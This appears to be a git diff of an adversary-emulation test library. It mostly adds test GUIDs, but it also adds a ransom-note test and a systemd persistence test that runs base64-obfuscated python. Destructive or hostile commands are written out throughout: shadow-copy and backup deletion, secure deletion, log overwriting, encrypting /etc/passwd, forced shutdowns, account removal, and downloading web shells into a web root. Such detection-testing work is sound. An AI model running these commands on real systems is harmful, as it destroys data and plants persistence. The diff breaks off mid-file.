+**auto_generated_guid:** 476419b5-aebf-4366-a131-ae3e8dae5fc2
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | sdelete_exe | Path of sdelete executable | Path | $env:TEMP&#92;Sdelete&#92;sdelete.exe|
 | file_to_delete | Path of file to delete | path | $env:TEMP&#92;T1485.txt|
@@ -48,7 +52,7 @@ Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
 ##### Description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -70,10 +74,14 @@ To stop the test, break the command with CTRL/CMD+C.
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 38deee99-fd65-4031-bec8-bfa4f9f26146
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | overwrite_source | Path of data source to overwrite with | Path | /dev/zero|
 | file_to_overwrite | Path of file to overwrite and remove | Path | /var/log/syslog|
diff --git a/atomics/T1486/T1486.md b/atomics/T1486/T1486.md
index b38a9f1f..afe77350 100644
--- a/atomics/T1486/T1486.md
+++ b/atomics/T1486/T1486.md
@@ -16,6 +16,8 @@ In cloud environments, storage objects within compromised accounts may also be e
 
 - [Atomic Test #4 - Encrypt files using openssl (Linux)](#atomic-test-4---encrypt-files-using-openssl-linux)
 
+- [Atomic Test #5 - PureLocker Ransom Note](#atomic-test-5---purelocker-ransom-note)
+
 
 <br/>
 
@@ -25,10 +27,14 @@ Uses gpg to encrypt a file
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 7b8ce084-3922-4618-8d22-95f996173765
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | pwd_for_encrypted_file | the password that you want for the encrypted file | String | passwd|
 | encrypted_file_path | path to the encrypted file | Path | /tmp/passwd.gpg|
@@ -54,7 +60,7 @@ rm #{encrypted_file_path}
 ##### Description: Finds where gpg is located
 ##### Check Prereq Commands:
 ```bash
-which_gpg=`which gpg` 
+which_gpg=`which gpg`
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -73,10 +79,14 @@ Uses 7z to encrypt a file
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 53e6735a-4727-44cc-b35b-237682a151ad
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | pwd_for_encrypted_file | the password that you want for the encrypted file | String | passwd|
 | encrypted_file_path | path to the encrypted file | Path | /tmp/passwd.zip|
@@ -102,7 +112,7 @@ rm #{encrypted_file_path}
 ##### Description: Finds where 7z is located
 ##### Check Prereq Commands:
 ```bash
-which_7z=`which 7z` 
+which_7z=`which 7z`
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -121,10 +131,14 @@ Attempts to encrypt data on target systems as root to simulate an inturruption a
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 08cbf59f-85da-4369-a5f4-049cffd7709f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | cped_file_path | path where you want your copied file to be | Path | /tmp/passwd|
 | root_input_file_path | path to the file that you want to be encrypted if you are root user | Path | /etc/passwd|
@@ -152,7 +166,7 @@ if [[ $USER == "root" ]]; then mv #{cped_file_path} #{root_input_file_path}; els
 ```bash
 which_ccencrypt=`which ccencrypt`
 which_ccdecrypt=`which ccdecrypt`
-if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi 
+if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -171,10 +185,14 @@ Uses openssl to encrypt a file
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 142752dc-ca71-443b-9359-cf6f497315f1
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | private_key_path | path to the private key | Path | /tmp/key.pem|
 | public_key_path | path to the public key | Path | /tmp/pub.pem|
@@ -204,7 +222,7 @@ rm #{encrypted_file_path}
 ##### Description: Finds where openssl is located
 ##### Check Prereq Commands:
 ```bash
-which_openssl=`which openssl` 
+which_openssl=`which openssl`
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -214,4 +232,37 @@ which_openssl=`which openssl`
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - PureLocker Ransom Note
+building the IOC (YOUR_FILES.txt) for the PureLocker ransomware 
+https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 649349c7-9abf-493b-a7a2-b1aa4d141528
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
+```
+
+#### Cleanup Commands:
+```cmd
+del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1
+```
+
+
+
+
+
 <br/>
diff --git a/atomics/T1486/T1486.yaml b/atomics/T1486/T1486.yaml
index 44f8222c..3e2b9d04 100644
--- a/atomics/T1486/T1486.yaml
+++ b/atomics/T1486/T1486.yaml
@@ -162,3 +162,20 @@ atomic_tests:
     cleanup_command: |
       $which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path}
       rm #{encrypted_file_path}
+
+- name: PureLocker Ransom Note
+  auto_generated_guid: 649349c7-9abf-493b-a7a2-b1aa4d141528
+  description: |
+    building the IOC (YOUR_FILES.txt) for the PureLocker ransomware 
+    https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/
+
+  supported_platforms:
+    - windows
+
+  executor:
+    name: command_prompt
+    elevation_required: true 
+    command: | 
+      echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
+    cleanup_command: | 
+      del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1
diff --git a/atomics/T1489/T1489.md b/atomics/T1489/T1489.md
index c3d686e0..a220070f 100644
--- a/atomics/T1489/T1489.md
+++ b/atomics/T1489/T1489.md
@@ -23,10 +23,14 @@ started by running the cleanup command.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 21dfb440-830d-4c86-a3e5-2a491d5a8d04
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | service_name | Name of a service to stop | String | spooler|
 
@@ -58,10 +62,14 @@ started by running the cleanup command.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 41274289-ec9c-4213-bea4-e43c4aa57954
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | service_name | Name of a service to stop | String | spooler|
 
@@ -94,10 +102,14 @@ started by running the cleanup command.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f3191b84-c38b-400b-867e-3a217a27795f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | process_name | Name of a process to kill | String | spoolsv.exe|
 
diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md
index 99ce741a..ad1339ef 100644
--- a/atomics/T1490/T1490.md
+++ b/atomics/T1490/T1490.md
@@ -39,6 +39,10 @@ https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 43819286-91a9-4369-90ed-d31fb4da2c01
+
+
+
 
 
 
@@ -56,7 +60,7 @@ vssadmin.exe delete shadows /all /quiet
 ##### Description: Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8.
 ##### Check Prereq Commands:
 ```powershell
-if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 } 
+if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -76,6 +80,10 @@ Shadow copies can only be created on Windows server or Windows 8.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6a3ff8dd-f49c-4272-a658-11c2fe58bd88
+
+
+
 
 
 
@@ -101,6 +109,10 @@ Deletes Windows Backup Catalog. This technique is used by numerous ransomware fa
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 263ba6cb-ea2b-41c9-9d4e-b652dadd002c
+
+
+
 
 
 
@@ -126,6 +138,10 @@ Upon execution, "The operation completed successfully." will be displayed in the
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** cf21060a-80b3-4238-a595-22525de4ab81
+
+
+
 
 
 
@@ -159,6 +175,10 @@ there may be no output displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 39a295ca-7059-4a88-86f6-09556c1211e7
+
+
+
 
 
 
@@ -184,6 +204,10 @@ to delete files from around the system.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6b1dbaf6-cc8a-4ea6-891f-6058569653bf
+
+
+
 
 
 
@@ -208,6 +232,10 @@ Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 584331dd-75bc-4c02-9e0b-17f5fd81c748
+
+
+
 
 
 
diff --git a/atomics/T1491.001/T1491.001.md b/atomics/T1491.001/T1491.001.md
index ff394927..805913fa 100644
--- a/atomics/T1491.001/T1491.001.md
+++ b/atomics/T1491.001/T1491.001.md
@@ -15,10 +15,14 @@ Downloads an image from a URL and sets it as the desktop wallpaper.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 30558d53-9d76-41c4-9267-a7bd5184bed3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url_of_wallpaper | URL pointing to the image file you wish to set as wallpaper | url | https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png|
 | pointer_to_orginal_wallpaper | Full path to where a file containing the original wallpaper location will be saved | String | $env:TEMP&#92;T1491.001-OrginalWallpaperLocation|
diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md
index 39645569..23067507 100644
--- a/atomics/T1496/T1496.md
+++ b/atomics/T1496/T1496.md
@@ -20,6 +20,10 @@ End the test by using CTRL/CMD+C to break.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 904a5a0e-fb02-490d-9f8d-0e256eb37549
+
+
+
 
 
 
diff --git a/atomics/T1497.001/T1497.001.md b/atomics/T1497.001/T1497.001.md
index 055376e4..f7cf9555 100644
--- a/atomics/T1497.001/T1497.001.md
+++ b/atomics/T1497.001/T1497.001.md
@@ -28,6 +28,10 @@ At boot, dmesg stores a log if a hypervisor is detected.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** dfbd1a21-540d-4574-9731-e852bd6fe840
+
+
+
 
 
 
@@ -52,6 +56,10 @@ Windows Management Instrumentation(WMI) objects contains system information whic
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 502a7dc4-9d6f-4d28-abf2-f0e84692562d
+
+
+
 
 
 
@@ -82,6 +90,10 @@ ioreg contains registry entries for all the device drivers in the system. If it'
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** a960185f-aef6-4547-8350-d1ce16680d09
+
+
+
 
 
 
diff --git a/atomics/T1505.002/T1505.002.md b/atomics/T1505.002/T1505.002.md
index 974d261b..e5ad87a3 100644
--- a/atomics/T1505.002/T1505.002.md
+++ b/atomics/T1505.002/T1505.002.md
@@ -18,10 +18,14 @@ More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchang
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 43e92449-ff60-46e9-83a3-1a38089df94d
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | class_factory | Class factory of transport agent. | string | Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory|
 | dll_path | Path of DLL to use as transport agent. | path | c:&#92;program files&#92;microsoft&#92;Exchange Server&#92;v15&#92;bin&#92;Microsoft.Exchange.Security.Interop.dll|
@@ -52,7 +56,7 @@ if(Get-Command "Get-TransportAgent" -ErrorAction Ignore){
 ##### Description: Microsoft Exchange SnapIn must be installed
 ##### Check Prereq Commands:
 ```powershell
-Get-TransportAgent -TransportService FrontEnd 
+Get-TransportAgent -TransportService FrontEnd
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1505.003/T1505.003.md b/atomics/T1505.003/T1505.003.md
index 5749d721..83933c8d 100644
--- a/atomics/T1505.003/T1505.003.md
+++ b/atomics/T1505.003/T1505.003.md
@@ -19,10 +19,14 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0a2ce662-1efa-496f-a472-2fe7b080db16
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | web_shell_path | The path to drop the web shell | string | C:&#92;inetpub&#92;wwwroot|
 | web_shells | Path of Web Shell | path | PathToAtomicsFolder&#92;T1505.003&#92;src&#92;|
@@ -32,12 +36,14 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/
 
 
 ```cmd
-xcopy #{web_shells} #{web_shell_path}
+xcopy /I /Y #{web_shells} #{web_shell_path}
 ```
 
 #### Cleanup Commands:
 ```cmd
-del #{web_shell_path} /q >nul 2>&1
+del #{web_shell_path}\b.jsp /q >nul 2>&1
+del #{web_shell_path}\tests.jsp /q >nul 2>&1
+del #{web_shell_path}\cmd.aspx /q >nul 2>&1
 ```
 
 
@@ -46,13 +52,13 @@ del #{web_shell_path} /q >nul 2>&1
 ##### Description: Web shell must exist on disk at specified location (#{web_shells})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{web_shells}) {exit 0} else {exit 1} 
+if (Test-Path #{web_shells}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
 New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp"
 Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx"
 ```
 
diff --git a/atomics/T1505.003/T1505.003.yaml b/atomics/T1505.003/T1505.003.yaml
index bc9476b0..066dafd1 100644
--- a/atomics/T1505.003/T1505.003.yaml
+++ b/atomics/T1505.003/T1505.003.yaml
@@ -27,12 +27,14 @@ atomic_tests:
     get_prereq_command: |
       New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp"
       Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx"
   executor:
     command: |
-      xcopy #{web_shells} #{web_shell_path}
+      xcopy /I /Y #{web_shells} #{web_shell_path}
     cleanup_command: |
-      del #{web_shell_path} /q >nul 2>&1
+      del #{web_shell_path}\b.jsp /q >nul 2>&1
+      del #{web_shell_path}\tests.jsp /q >nul 2>&1
+      del #{web_shell_path}\cmd.aspx /q >nul 2>&1
     name: command_prompt
 
diff --git a/atomics/T1518.001/T1518.001.md b/atomics/T1518.001/T1518.001.md
index 774a3286..97c326fc 100644
--- a/atomics/T1518.001/T1518.001.md
+++ b/atomics/T1518.001/T1518.001.md
@@ -32,6 +32,10 @@ and specific security software.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f92a380f-ced9-491f-b338-95a991418ce2
+
+
+
 
 
 
@@ -63,6 +67,10 @@ when sucessfully executed, powershell is going to processes related AV products
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 7f566051-f033-49fb-89de-b6bacab730f0
+
+
+
 
 
 
@@ -91,6 +99,10 @@ when sucessfully executed, command shell  is going to display AV/Security softwa
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** ba62ce11-e820-485f-9c17-6f3c857cd840
+
+
+
 
 
 
@@ -116,6 +128,10 @@ when sucessfully executed, command shell  is going to display AV/Security softwa
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 23b91cd2-c99c-4002-9e41-317c63e024a2
+
+
+
 
 
 
@@ -142,6 +158,10 @@ when sucessfully executed, the test is going to display sysmon driver instance i
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** fe613cf3-8009-4446-9a0f-bc78a15b66c9
+
+
+
 
 
 
@@ -168,6 +188,10 @@ when sucessfully executed, the test is going to display installed AV software.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1553252f-14ea-4d3b-8a08-d7a4211aa945
+
+
+
 
 
 
diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md
index 7925bb5f..796e4ffc 100644
--- a/atomics/T1518/T1518.md
+++ b/atomics/T1518/T1518.md
@@ -22,6 +22,10 @@ Upon execution, version information about internet explorer will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 68981660-6670-47ee-a5fa-7e74806420a4
+
+
+
 
 
 
@@ -47,6 +51,10 @@ software name and version information will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b
+
+
+
 
 
 
@@ -72,6 +80,10 @@ Adversaries may attempt to get a listing of non-security related software that i
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 103d6533-fd2a-4d08-976a-4a598565280f
+
+
+
 
 
 
diff --git a/atomics/T1529/T1529.md b/atomics/T1529/T1529.md
index 15aa0390..13cf9b66 100644
--- a/atomics/T1529/T1529.md
+++ b/atomics/T1529/T1529.md
@@ -33,10 +33,14 @@ This test shuts down a Windows system.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ad254fa8-45c0-403b-8c77-e00b3d3e7a64
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | timeout | Timeout period before shutdown (seconds) | string | 1|
 
@@ -62,10 +66,14 @@ This test restarts a Windows system.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f4648f0d-bf78-483c-bafc-3ec99cd1c302
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | timeout | Timeout period before restart (seconds) | string | 1|
 
@@ -91,10 +99,14 @@ This test restarts a macOS/Linux system.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 6326dbc4-444b-4c04-88f4-27e94d0327cb
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | timeout | Time to restart (can be minutes or specific time) | string | now|
 
@@ -120,10 +132,14 @@ This test shuts down a macOS/Linux system using a halt.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 4963a81e-a3ad-4f02-adda-812343b351de
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | timeout | Time to shutdown (can be minutes or specific time) | string | now|
 
@@ -149,6 +165,10 @@ This test restarts a macOS/Linux system via `reboot`.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 47d0b042-a918-40ab-8cf9-150ffe919027
+
+
+
 
 
 
@@ -173,6 +193,10 @@ This test shuts down a Linux system using `halt`.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 918f70ab-e1ef-49ff-bc57-b27021df84dd
+
+
+
 
 
 
@@ -197,6 +221,10 @@ This test restarts a Linux system using `halt`.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 78f92e14-f1e9-4446-b3e9-f1b921f2459e
+
+
+
 
 
 
@@ -221,6 +249,10 @@ This test shuts down a Linux system using `poweroff`.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 73a90cd2-48a2-4ac5-8594-2af35fa909fa
+
+
+
 
 
 
@@ -245,6 +277,10 @@ This test restarts a Linux system using `poweroff`.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 61303105-ff60-427b-999e-efb90b314e41
+
+
+
 
 
 
diff --git a/atomics/T1531/T1531.md b/atomics/T1531/T1531.md
index 025c33ba..0e5483e1 100644
--- a/atomics/T1531/T1531.md
+++ b/atomics/T1531/T1531.md
@@ -22,10 +22,14 @@ the password "HuHuHUHoHo283283".
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_account | User account whose password will be changed. | string | AtomicAdministrator|
 | new_user_password | Password to use if user account must be created first | string | User2ChangePW!|
@@ -58,10 +62,14 @@ Deletes a user account to prevent access. Upon execution, run the command "net u
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f21a1d7d-a62f-442a-8c3a-2440d43b19e5
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | new_user_password | Password to use if user account must be created first | string | User2DeletePW!|
 | user_account | User account to be deleted. | string | AtomicUser|
@@ -89,10 +97,14 @@ This test will remove an account from the domain admins group
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 43f71395-6c37-498e-ab17-897d814a0947
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | super_user | Account used to run the execution command (must include domain). | string | domain&#92;super_user|
 | super_pass | super_user account password. | string | password|
@@ -119,7 +131,7 @@ if((Get-ADUser #{remove_user} -Properties memberof).memberof -like "CN=Domain Ad
 ##### Description: Requires the Active Directory module for powershell to be installed.
 ##### Check Prereq Commands:
 ```powershell
-if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} 
+if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1543.001/T1543.001.md b/atomics/T1543.001/T1543.001.md
index 9eecc4dd..5f572f48 100644
--- a/atomics/T1543.001/T1543.001.md
+++ b/atomics/T1543.001/T1543.001.md
@@ -17,10 +17,14 @@ Create a plist and execute it
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** a5983dee-bf6c-4eaf-951c-dbc1a7b90900
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | plist_filename | filename | string | com.atomicredteam.plist|
 | path_malicious_plist | Name of file to store in cron folder | string | $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist|
@@ -42,7 +46,7 @@ sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}
 ##### Description: The shared library must exist on disk at specified location (#{path_malicious_plist})
 ##### Check Prereq Commands:
 ```bash
-if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; 
+if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md
index c9bfec54..7e10bdf0 100644
--- a/atomics/T1543.002/T1543.002.md
+++ b/atomics/T1543.002/T1543.002.md
@@ -16,6 +16,8 @@ While adversaries typically require root privileges to create/modify service uni
 
 - [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service)
 
+- [Atomic Test #2 - Create Systemd Service file,  Enable the service , Modify and Reload the service.](#atomic-test-2---create-systemd-service-file--enable-the-service--modify-and-reload-the-service)
+
 
 <br/>
 
@@ -25,10 +27,14 @@ This test creates a Systemd service unit file and enables it as a service.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** d9e4f24f-aa67-4c6e-bcbf-85622b697a7c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | systemd_service_path | Path to systemd service unit file | Path | /etc/systemd/system|
 | systemd_service_file | File name of systemd service unit file | String | art-systemd-service.service|
@@ -75,4 +81,71 @@ systemctl daemon-reload
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Create Systemd Service file,  Enable the service , Modify and Reload the service.
+This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** c35ac4a8-19de-43af-b9f8-755da7e89c89
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+cat > /etc/init.d/T1543.002 << EOF
+#!/bin/bash
+### BEGIN INIT INFO
+# Provides : Atomic Test T1543.002
+# Required-Start: $all
+# Required-Stop : 
+# Default-Start: 2 3 4 5
+# Default-Stop: 
+# Short Description: Atomic Test for Systemd Service Creation
+### END INIT INFO
+python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))"
+EOF
+
+chmod +x /etc/init.d/T1543.002
+if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ;
+systemctl enable T1543.002
+systemctl start T1543.002
+
+echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
+systemctl daemon-reload
+systemctl restart T1543.002
+```
+
+#### Cleanup Commands:
+```bash
+systemctl stop T1543.002
+systemctl disable T1543.002
+rm -rf /etc/init.d/T1543.002
+systemctl daemon-reload
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: System must be Ubuntu ,Kali OR CentOS.
+##### Check Prereq Commands:
+```bash
+if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+echo Please run from Ubuntu ,Kali OR CentOS.
+```
+
+
+
+
 <br/>
diff --git a/atomics/T1543.002/T1543.002.yaml b/atomics/T1543.002/T1543.002.yaml
index 8b0a1de2..393c59b4 100644
--- a/atomics/T1543.002/T1543.002.yaml
+++ b/atomics/T1543.002/T1543.002.yaml
@@ -66,3 +66,49 @@ atomic_tests:
       systemctl daemon-reload
     name: bash
 
+
+- name: Create Systemd Service file,  Enable the service , Modify and Reload the service.
+  auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
+  description: |
+    This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. 
+
+  supported_platforms:
+    - linux
+  dependencies:
+    - description: |
+        System must be Ubuntu ,Kali OR CentOS.
+      prereq_command: |
+        if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi;
+      get_prereq_command: |
